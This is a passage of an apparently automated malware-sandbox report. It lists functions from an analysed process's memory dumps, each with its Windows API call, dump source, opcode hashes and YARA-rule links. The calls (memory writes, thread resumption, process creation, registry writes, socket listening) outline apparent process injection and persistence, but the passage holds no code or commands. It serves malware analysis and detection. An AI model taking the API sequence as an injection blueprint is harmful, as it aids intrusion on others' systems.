                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 0aa50b40f66f5088010acd65ffda8a7498cec5ac0a2d309413e08e246c292b93
                                                                      • Instruction ID: 9db27358bdaa72913696cb8c6ff270fb4747301b58a68c01110b91c121743d88
                                                                      • Opcode Fuzzy Hash: 0aa50b40f66f5088010acd65ffda8a7498cec5ac0a2d309413e08e246c292b93
                                                                      • Instruction Fuzzy Hash: 0E11B271514204AFEB10CF15DC84FA7FBE8EF44720F14846BEE499B241D674A904CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05295AF1, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 05295B5C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 3527976591-0
                                                                      • Opcode ID: 0da96255ec346fc2c85507f56358b28dacad92b4de1d619b70f9877018cdca55
                                                                      • Instruction ID: 70eec08913608ca8b33ccddb7ce7899881925e780ed9e78fc7d6832587365d13
                                                                      • Opcode Fuzzy Hash: 0da96255ec346fc2c85507f56358b28dacad92b4de1d619b70f9877018cdca55
                                                                      • Instruction Fuzzy Hash: 80117F71508384AFDB22CF55DC44B62FFB4EF46220F08859AEE849B252C275A558DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290A8E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: 504999ce92677992105dc542a2432f316e0db104e6669cdb72f78e2333b03e31
                                                                      • Instruction ID: b7ab18123bad72965d3c0093935c11fba94185511e16aea87954f26674ac40cc
                                                                      • Opcode Fuzzy Hash: 504999ce92677992105dc542a2432f316e0db104e6669cdb72f78e2333b03e31
                                                                      • Instruction Fuzzy Hash: 7811C271500204EEEB11DF25DC85F66FFA8EF45720F1484ABEE489B241D6B4A404CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529545C, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 052954C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      • Opcode ID: 3fc60474e55800f6693bbfdbea63d8e2077d283ded6a6cd758403b192c2e7f86
                                                                      • Instruction ID: bc27b01889fda2bf6bf7f9a5b65dd5f18f0ff68845c96bad785e633e93b26dd6
                                                                      • Opcode Fuzzy Hash: 3fc60474e55800f6693bbfdbea63d8e2077d283ded6a6cd758403b192c2e7f86
                                                                      • Instruction Fuzzy Hash: 67118B71509380AFDB228F25DC55E62FFF4EF06210F0884DAED854F262C276A958DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05292D72, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292DC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersInfo
                                                                      • String ID:
                                                                      • API String ID: 3177971545-0
                                                                      • Opcode ID: 2c563ad054268d956e568a4946d2750eedd659772e887973f3392a533dfb6bf6
                                                                      • Instruction ID: 09ceed8b49c7118d14aa67d94fe7a16c0f8ba9d7187cedd73ca682625276082d
                                                                      • Opcode Fuzzy Hash: 2c563ad054268d956e568a4946d2750eedd659772e887973f3392a533dfb6bf6
                                                                      • Instruction Fuzzy Hash: 8801AD75510604EEEB20DB19DC85FA6FFA8EF45720F1480ABEE499B341D6A4A4098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294E52, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05294E9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdjustPrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 2874748243-0
                                                                      • Opcode ID: 3bc82cf6bdeb5dedc03de99c74fe16c03323d35cef54448ea744b035e5710d44
                                                                      • Instruction ID: 9baf26904d2163ffa295d569e991ff9a2265c5011f0771017f939bdf80050b2c
                                                                      • Opcode Fuzzy Hash: 3bc82cf6bdeb5dedc03de99c74fe16c03323d35cef54448ea744b035e5710d44
                                                                      • Instruction Fuzzy Hash: F4119E315106049FDF24DF65D884B66FFE4FF04220F08C46EEE8A8B611D271E418CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05295B1E, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 05295B5C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 3527976591-0
                                                                      • Opcode ID: 00091dd1e8283d898ebbd452ac667c94ce85ae7b5c5b88ac8b930ec013be1a4f
                                                                      • Instruction ID: f4b68d435931d08be92706eeaa44d7a7eb4fc8ecc54efce7ccc2afbda123bbb1
                                                                      • Opcode Fuzzy Hash: 00091dd1e8283d898ebbd452ac667c94ce85ae7b5c5b88ac8b930ec013be1a4f
                                                                      • Instruction Fuzzy Hash: 7C019E31610600DFDF21CF55D884B66FFE0EF45320F18C5AAEE494B616C2B5A418DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: recv
                                                                      • String ID:
                                                                      • API String ID: 1507349165-0
                                                                      • Opcode ID: 2a04d8c38aa615caaedbb45655c6ae194a68abf3ec7600d9ed6c4637f2719171
                                                                      • Instruction ID: 70be9e4efec538698b74d4979fa9796bbbe43444dfd0a1eb47f270bc81ec5b36
                                                                      • Opcode Fuzzy Hash: 2a04d8c38aa615caaedbb45655c6ae194a68abf3ec7600d9ed6c4637f2719171
                                                                      • Instruction Fuzzy Hash: 5A019E315006409FDB60CF95D884BA6FFA0EF48320F18C5AAEE498B612D775A408CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05295A76, Relevance: 1.5, APIs: 1, Instructions: 40nativethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtResumeThread.NTDLL(?,?), ref: 05295AAB
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 7dac916606207fce974d712ba6a4f971c65a808b682088679d67489c1df0d5c2
                                                                      • Instruction ID: 5a5987c1e1c2ea4e3cceeda91d4b95f64a4c79a65bcbc68433a07811664cb6ee
                                                                      • Opcode Fuzzy Hash: 7dac916606207fce974d712ba6a4f971c65a808b682088679d67489c1df0d5c2
                                                                      • Instruction Fuzzy Hash: B0017871A102449FEB11CF15D884B66FFE4EF44220F28C4AADE498B212D2B5A808CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529548A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 052954C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      • Opcode ID: a567519006127c712a5f6e7e3e879e2f5ac9c196f989e3e7a57089e842587ea0
                                                                      • Instruction ID: 4682cb89dfac02c61417972b777a3ad3f6b2b94b750dc9627b3fd3de253359f4
                                                                      • Opcode Fuzzy Hash: a567519006127c712a5f6e7e3e879e2f5ac9c196f989e3e7a57089e842587ea0
                                                                      • Instruction Fuzzy Hash: 4E018F75610640DFDB61CF15D844B26FFA0FF04721F18D09ADE490B312C2B5A418CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05205B73, Relevance: .1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 643e2b17c4553b9917d9bfb961c99d76796322f15c6c23653bb54c44a4d5b549
                                                                      • Instruction ID: 4eff43da9683146c895f911376dee804c4c14b5f0fb5baa3588478cb99b98961
                                                                      • Opcode Fuzzy Hash: 643e2b17c4553b9917d9bfb961c99d76796322f15c6c23653bb54c44a4d5b549
                                                                      • Instruction Fuzzy Hash: 9E51D270E022188FDB54DFA9C894BEDBBF2BF89300F1095AAD409B7295D7345A85CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052077EB, Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d689b2b7ccda991826f0e75ea047aac09f912be258a7a5d9e8663b6e65c819f2
                                                                      • Instruction ID: 40d5b507ced893324fcba0c4a65e953c91af8faeffbce6ead9dc891c606b1764
                                                                      • Opcode Fuzzy Hash: d689b2b7ccda991826f0e75ea047aac09f912be258a7a5d9e8663b6e65c819f2
                                                                      • Instruction Fuzzy Hash: 0E41F175E122189FCB04DFA8E8406EEBBB2FF89301F10556AD415B7390DB396A42CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052077F0, Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 418c1dc343373a7a3f75e0b6959d8cf17b012c3c835794a3cc28340d13322a5c
                                                                      • Instruction ID: 85ea4543ca4c1bf3d2b05459f7ce3e98a201f491d39ef45636f9bc1b43af89f4
                                                                      • Opcode Fuzzy Hash: 418c1dc343373a7a3f75e0b6959d8cf17b012c3c835794a3cc28340d13322a5c
                                                                      • Instruction Fuzzy Hash: 6431AE70E022199FDB09DFA9D854AEEBBB2EB88301F10442AD415B7390DB396A41CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0520791B, Relevance: 2.0, APIs: 1, Instructions: 457libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8ec9f7d44075083ac6a583759bb5c3a5fb76d993a5745e7c2cb0b87982e0a6ed
                                                                      • Instruction ID: b98fe48b3c697ad360bde3787e25512af765b96c0a2797ac37f30fd69015c565
                                                                      • Opcode Fuzzy Hash: 8ec9f7d44075083ac6a583759bb5c3a5fb76d993a5745e7c2cb0b87982e0a6ed
                                                                      • Instruction Fuzzy Hash: 6B32A274941229CFCB65DF24C994BEEB7B2BF4A304F1085EAD809A7254DB359E85CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052081C4, Relevance: 1.9, APIs: 1, Instructions: 438libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bc5b29fba71ca027989f69419dead465788d31b1cfaa2b1eff3dd56d914f4205
                                                                      • Instruction ID: f745638c772fdcbb1a62f6bf50826e7f11a667e02a812a47f8b0dce1967018fb
                                                                      • Opcode Fuzzy Hash: bc5b29fba71ca027989f69419dead465788d31b1cfaa2b1eff3dd56d914f4205
                                                                      • Instruction Fuzzy Hash: CB229174941229CFCB65DF24C994BEDB7B2BF4A304F1095EAD809A7254DB35AE81CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05293B98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 05293CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      • Opcode ID: 88f0ea6b6299e02c40e69003a211604c5cf28128b8f3ab5d7dcb9d3060032b31
                                                                      • Instruction ID: 82ff17a42da46a1b509845da14e8c7696b42c95bf4f531272ef869a7740302dc
                                                                      • Opcode Fuzzy Hash: 88f0ea6b6299e02c40e69003a211604c5cf28128b8f3ab5d7dcb9d3060032b31
                                                                      • Instruction Fuzzy Hash: 35516C7100D3C06FEB238B208C65FA6BFB8AF07614F1A45DBE9849F1A3D2655909C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052930B4, Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 052931A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      • Opcode ID: 08c2c361ee767e81bd1cbea4fcaae3cf1f52f7bfdeb69fb3c022ecf990433e60
                                                                      • Instruction ID: baf993cb83b5bae5944bffefc8364085619e8d0ddf15693b843c8f34568d363f
                                                                      • Opcode Fuzzy Hash: 08c2c361ee767e81bd1cbea4fcaae3cf1f52f7bfdeb69fb3c022ecf990433e60
                                                                      • Instruction Fuzzy Hash: 5E416E724083846FEB12CB658C51FA6BFB8EF07310F0985DBE985CB1A3D6659909C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFB729, Relevance: 1.6, APIs: 1, Instructions: 120registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 02AFB802
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 2b620bc5b9cabb487400e55409b1a77abacfbf448f13ffb0de6c55ae4cf27b47
                                                                      • Instruction ID: 803447e43883e654d045cb6b9e672f12e885fa22efa99fea263ad83610502100
                                                                      • Opcode Fuzzy Hash: 2b620bc5b9cabb487400e55409b1a77abacfbf448f13ffb0de6c55ae4cf27b47
                                                                      • Instruction Fuzzy Hash: CD414B2500E3C0AFD3139B358C65A61BFB4AF47624B0E85DBE5C4CF5A3D6285909C7B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05293392, Relevance: 1.6, APIs: 1, Instructions: 114networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293479
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      • Opcode ID: ca1021c8d3b5101f933224255d93784f3ae696515fc95292bb86548550e3df8f
                                                                      • Instruction ID: c87f9ccd55b91ac34e7e555e7b8e80f85cf812d4b8d520fd9661b758b03087d6
                                                                      • Opcode Fuzzy Hash: ca1021c8d3b5101f933224255d93784f3ae696515fc95292bb86548550e3df8f
                                                                      • Instruction Fuzzy Hash: 7E413E7540D7C06FD7238B248C54E66BFB8AF07610F0A85DBE985CF1A3D229A849C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529368A, Relevance: 1.6, APIs: 1, Instructions: 110registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293741
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 49e7748734440037b8b23851aef23789f4fc06e6d741f4e4730870b6ab7bd049
                                                                      • Instruction ID: 37a2848e702848c1cff1d7c001dcc63ec113b41958e5ca7698c256f910790420
                                                                      • Opcode Fuzzy Hash: 49e7748734440037b8b23851aef23789f4fc06e6d741f4e4730870b6ab7bd049
                                                                      • Instruction Fuzzy Hash: FF3193B1408384AFE712CF64DC44FA6BFBCEF46310F08899BE9859F253D264A909C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052958EF, Relevance: 1.6, APIs: 1, Instructions: 110processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 052959DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 093287dc4fc63fbf8d8ad36455ece70ca9f78834f7b25ad904cf4f2aefca5bd1
                                                                      • Instruction ID: 565cbceff48e41d5ae3abda72a021c35098e93c87a554cba78cbbb9fd67e425b
                                                                      • Opcode Fuzzy Hash: 093287dc4fc63fbf8d8ad36455ece70ca9f78834f7b25ad904cf4f2aefca5bd1
                                                                      • Instruction Fuzzy Hash: 2E319171200301AFEB22CF65CC81FA7BBECEF05710F14895AFA459B191D265E949CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294936, Relevance: 1.6, APIs: 1, Instructions: 104registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05294A00
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: bc6981a0221060ca244e07788a5e1ee42156890651f65a66319fb100e1341237
                                                                      • Instruction ID: cba9a7584906eb025fcecd00e3633a87e8557d3ce8eac775602e53f811a920e6
                                                                      • Opcode Fuzzy Hash: bc6981a0221060ca244e07788a5e1ee42156890651f65a66319fb100e1341237
                                                                      • Instruction Fuzzy Hash: 05315E7100D3C15FDB238B648C50A62BFB8AF07210F1985DBE985DB1A3D2689849C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529207C, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 0529215A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionsEnum
                                                                      • String ID:
                                                                      • API String ID: 3832085198-0
                                                                      • Opcode ID: 24b56c40e2ae7922b18d3b6a546ea476c5d0479fac0d0986a9a5a0eebf20d6aa
                                                                      • Instruction ID: 5e15d32ec03b400a9971bb9efe96abc5b5f34e4eb64339d3736ca2c8ef0057b1
                                                                      • Opcode Fuzzy Hash: 24b56c40e2ae7922b18d3b6a546ea476c5d0479fac0d0986a9a5a0eebf20d6aa
                                                                      • Instruction Fuzzy Hash: 38316B7540E3C05FD7138B358C65AA1BFB4EF87614B0E41DBD8848F1A3D2686909CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFBBF3, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 02AFBCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 1fd7dcef2200c760e916e88e0ebbe645515a58ce7068127f299f3d5441073043
                                                                      • Instruction ID: 5afb9836743c8f8845d5b219707da177b07ea2d67375184a574524b398bbc0a3
                                                                      • Opcode Fuzzy Hash: 1fd7dcef2200c760e916e88e0ebbe645515a58ce7068127f299f3d5441073043
                                                                      • Instruction Fuzzy Hash: 2F318FB1504380AFE722CB65CC44F62BFF8EF4A614F08849AF9848B252D775E909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05295912, Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 052959DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: cf71b6e5ee05a6262e29ac888af1ca2be2f0c5b9592195a5806bc28b352c3642
                                                                      • Instruction ID: edb2ffbe26e0bd9445bef46f26ef22c5c9582881f46e139adfa9ebb4b0060844
                                                                      • Opcode Fuzzy Hash: cf71b6e5ee05a6262e29ac888af1ca2be2f0c5b9592195a5806bc28b352c3642
                                                                      • Instruction Fuzzy Hash: 43319271210301AFFB31CF65CC81FA6BBECEF04710F14896AFA459A291D6B1E905CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05293205, Relevance: 1.6, APIs: 1, Instructions: 97windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 052932CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FormatMessage
                                                                      • String ID:
                                                                      • API String ID: 1306739567-0
                                                                      • Opcode ID: 01119907805712a370f6d468fe15c668a7be8eaaefde06e58cd6041377e71e78
                                                                      • Instruction ID: 232954a14b0e87fc73c0c0c5d8b485f5a6c17d4e9411a1d24bd791df7fb3dafc
                                                                      • Opcode Fuzzy Hash: 01119907805712a370f6d468fe15c668a7be8eaaefde06e58cd6041377e71e78
                                                                      • Instruction Fuzzy Hash: DC317E7154E3C05FD7038B758C61A66BFB49F87610F1D80CBD8848F1A3D625691AC7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529388A, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293936
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 8d573500d29a2366819bf50f90c88062d7a4bcaf5a6eb0a3ca2f58948e4e57f0
                                                                      • Instruction ID: 46421ef113b002af48cfe967005a128daaac94bd6df91b457b4f328f7e58cdf6
                                                                      • Opcode Fuzzy Hash: 8d573500d29a2366819bf50f90c88062d7a4bcaf5a6eb0a3ca2f58948e4e57f0
                                                                      • Instruction Fuzzy Hash: B23193B1509784AFEB22CB24DC45F67FFA8EF46710F08849BED849B253D264A909C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFAB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 02AFABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 632aaeedd911d1bfc1bf831eec1b2a54234c1875da7832768f0b1b737bf127b8
                                                                      • Instruction ID: 64c64cc3cb27f7d3849c96b113659dc8ccc6918351c79dabdba308eed6d5f800
                                                                      • Opcode Fuzzy Hash: 632aaeedd911d1bfc1bf831eec1b2a54234c1875da7832768f0b1b737bf127b8
                                                                      • Instruction Fuzzy Hash: AC31D672504384AFE7228B64CC45FA7BFACEF06710F04849BFD849B152D264A809C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05291109, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 8402fd7f197bba375e5d6edfecb0f042fdc14203a5fa541a3a70cf19e7196893
                                                                      • Instruction ID: cd74efcb6545f28e1e44713d3e0dd6935e825b9448285a6f13c274b7006acc17
                                                                      • Opcode Fuzzy Hash: 8402fd7f197bba375e5d6edfecb0f042fdc14203a5fa541a3a70cf19e7196893
                                                                      • Instruction Fuzzy Hash: 1D3191B1509780AFEB12CB25DC45F96FFF8EF06314F08849AE9849B253D375A909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529310E, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 052931A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      • Opcode ID: 705f24bf1793c27fccb7d513ce021755aa76d4d711217a222caaf0ae8fc94e17
                                                                      • Instruction ID: 074014b39be19a81269ff689f77c1fde2d94349cf7c337d8930aa813c16f77dd
                                                                      • Opcode Fuzzy Hash: 705f24bf1793c27fccb7d513ce021755aa76d4d711217a222caaf0ae8fc94e17
                                                                      • Instruction Fuzzy Hash: 1D219172510204AFEB20CF65DC81FABFBECEF04710F04896AEA46CA251DA70E548CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290C18, Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
